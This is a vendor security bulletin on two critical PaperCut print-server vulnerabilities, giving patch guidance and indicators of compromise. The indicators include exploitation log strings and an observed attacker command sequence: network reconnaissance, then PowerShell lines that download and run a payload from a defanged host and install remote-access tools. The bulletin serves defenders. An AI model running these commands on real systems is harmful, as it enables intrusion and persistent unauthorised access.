Customer Portal
  • Vulnerability Information

    Warning alert system concept, system hacked on computer network, cybercrime and virus, Malicious software, compromised information, illegal connection, data breach cybersecurity vulnerability.warning, hacker, alert, crime, system, security, spyware, attack, network, access, cyber, data, information, internet, message, password, concept, cyber security, protection, server, software, virus, computer, danger, technology, digital, connection, cyberspace, leak, online, safety, website, fraud, malicious, vulnerability, web, antivirus, breach, detection, malware, intrusion, corporate, firewall, privacy, problem, typing, laptop, notebook, notice, red, warning, hacker, alert, crime, system, security, spyware, attack, network, access, cyber, data, information, internet, message, password, concept, cyber security, protection, server, software, virus, computer, danger, technology, digital, connection, cyberspace, leak, online, safety, website, fraud, malicious, vulnerability, web, antivirus, breach, detection, malware, intrusion, corporate, firewall, privacy, problem, typing, laptop, notebook, notice
Warning alert system concept, system hacked on computer network, cybercrime and virus, Malicious software, compromised information, illegal connection, data breach cybersecurity vulnerability
Corporate/Company,  warning,  hacker,  alert,  crime,  system,  security,  spyware,  attack,  network,  access,  cyber,  data,  information,  internet,  message,  password,  concept,  protection,  server,  software,  virus,  computer,  danger,  technology,  digital,  connection,  cyberspace,  leak,  online,  safety,  website,  fraud,  malicious,  vulnerability,  web,  antivirus,  breach,  detection,  malware,  intrusion,  corporate,  firewall,  privacy,  problem,  typing,  laptop,  notebook,  notice,  red,  cyber security,  log4j

Context

This bulletin relates to PaperCut MF and NG print management software. We’d like to specifically draw this to the attention of PaperCut customers who have on premise MF or NG software that is installed on servers which are exposed to the internet. Most typically this is customers who provide customer printing and deploy payment gateways.

PaperCut first reported that a vulnerability in their MF and NG software was being exploited in the wild on 27th August. Konica Minolta’s action between 27th August and now has focussed on providing customers with advice on remediation measures. This has been via direct contact (telephone and email).

As of today, PaperCut have provided a patch with further remediation, which rolls up the two patches released on 27th and 28thAugust.

This event is continually developing, and whilst Konica Minolta will continue to communicate with our customers you are also advised to regularly review updates from PaperCut here - URGENT Security Advisory: PaperCut NG/MF Security Bulletin (27 Aug 2026) | PaperCut

CVE
Notes
CVSS rating and vector
CVE-2026-82078

Unsafe Dynamic Class Loading in Database Connector

An unsafe dynamic class loading vulnerability exists in the database connection utilities of PaperCut MF and PaperCut NG. The application instantiates database driver classes based on configurable driver names without validating against an allowlist of approved drivers.

  • Vulnerability Type: CWE-470 Use of Externally-Controlled input to select classes or code ('unsafe reflection').
  • Impact: If an attacker can manipulate system configuration parameters, this enables the execution of arbitrary Java bytecode residing on the application classpath under the security context of the PaperCut server process.
  • Mitigated in: PaperCut NG/MF Emergency Patch (see above Release 3).

9.4 (CRITICAL)

CVE-2026-81578

Authentication Bypass

An improper access control vulnerability exists in the web management interface of PaperCut MF and PaperCut NG. Under specific conditions, unauthenticated remote requests targeting administrative functions can trigger backend actions prior to the completion of access validation checks.

  • Vulnerability Type: CWE-306 Missing authentication for critical function.
  • Impact: This allows an unauthenticated remote attacker to modify certain system configurations.
  • Mitigated in: PaperCut NG/MF Emergency Patch (see above Release 3).

8.8 (HIGH)

Indicators of compromise

As previously disclosed, the following may be indicators of compromise.

  • Alerts from intrusion-detection, endpoint-security, or network-monitoring tools involving the PaperCut Application Server, particularly suspicious post-exploitation activity from pc-app.exe.
  • Missing, unexpectedly truncated, or deleted PaperCut server.log files.
  • Any of the following entries in server.log:

ERROR No suitable driver found for jdbc:no:x

ERROR DatabaseUtils - Database error looking up cardID: VALUES CAST

Additional indicators of compromise [updated 30 August 2026, 3:35pm (AEST)]:

We are aware of the following additional indicators of compromise.

  • Strings in server.log
  • DB URL: jdbc:derby:memory:pwn;create=true
  • Database error looking up cardID: VALUES CAST(X'cafebabe
  • Database error looking up cardID: VALUES CAST('
  • DB URL: jdbc:no:x DB Driver: <5-char random name>

Files written to disk:

• <install>\server\lib\<5-char-name>.class

• <install>\server\data\content\<5-char-name>.cmd

• <install>\server\data\content\<5-char-name>.out

Note that these files may be cleaned up by the attacker as activity progresses, so their absence does not rule out compromise.

As every customer environment is unique, it is difficult to identify a single consistent pattern of post-compromise activity, but observed behaviour includes the pc-app.exe (or pc-app) process launching child shell processes (cmd.exe) and running whoami & ver, with endpoint protection in some cases preventing further execution and isolating the machine.

Where execution was not prevented, the following command sequence was observed, shown as elapsed time from the first command (starting at 00:00:00) rather than wall-clock time (URLs below are defanged with hxxp and [.] to prevent accidental execution; replace with http/. before using in detection tooling or blocklists):

00:00:00 whoami & ver
00:01:19 tasklist
00:04:42 nltest /dclist:
00:06:09 quser & dir c:\users
00:16:07 powershell Invoke-WebRequest -Uri hxxps://sendit[.]sh/Gg7Rp/ace[.]exe -OutFile C:\ProgramData\ace.exe
00:18:07 dir c:\programdata /a
00:19:27 c:\programdata\ace.exe /S
00:21:29 Windows Service "Remote Access Service" installed (SimpleHelp agent, C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\restricted\SimpleService.exe, running as LocalSystem, set to auto-start)
00:21:41 tasklist
00:27:37 powershell Invoke-WebRequest -Uri hxxps://download[.]anydesk[.]com/AnyDesk.exe -OutFile C:\ProgramData\AnyDesk.exe

We recommend checking for the presence of a Windows service named “Remote Access Service” running SimpleService.exe from the path above, and for unexpected AnyDesk installations, as potential indicators of post-compromise remote access tooling.

Important: The absence of the above indicators is not confirmation that a system has not been affected. PaperCut will publish validated, specific indicators and further guidance as soon as they are available.

Remediations

Emergency Patch 3 has been released for v24, v25, and v26 by PaperCut’s emergency response team.

This release addresses two known regressions (SAML and legacy Microsoft SQL Server support) and adds additional hardening and mitigation against potential attack chains.

4.1 Konica Minolta Hosted Customers

Customers whose print servers are hosted by Konica Minolta will be contacted to arrange patching subject to local change control processes and agreement.

4.2 Customers running V24, V25 or V26 on their own infrastructure

Customers who host their own print solution infrastructure are advised to apply the third patch as soon as possible. This is the most expedient method for ensuring your organisation is protected at the earliest opportunity. However, if you require assistance with patching, please log a support ticket to arrange for this to be scheduled.

4.3 Customers running version V23

Please log a support ticket.

4.4 Customers running an unsupported version of PaperCut (below version 23)

Please email U2FsdGVkX1/TwuGO83zL0vXLHDEPmkOk4FacV/UceRqpOJJx5c5kzjOYKsfrUL4m and U2FsdGVkX1+/y4Gmdoa1xWJxe0B2B+xzN4g7qdE4eUBSp+K5K8ivhDdmQ7Q3X8zrFvVLG/bNHYLxjc3XtJPUZg==

FAQs

Enhancing the Security of Products and Services

Konica Minolta considers the security of its products and services to be an important responsibility and will continue to actively respond to incidents and vulnerabilities.

Contact

Self-Service Portal (Ebiz): Access our user-friendly portal below. Here, you can conveniently sign up or utilise our Guest functionality.

For all account related queries please contact your Account Manager or email enquiries@konicaminolta.co.uk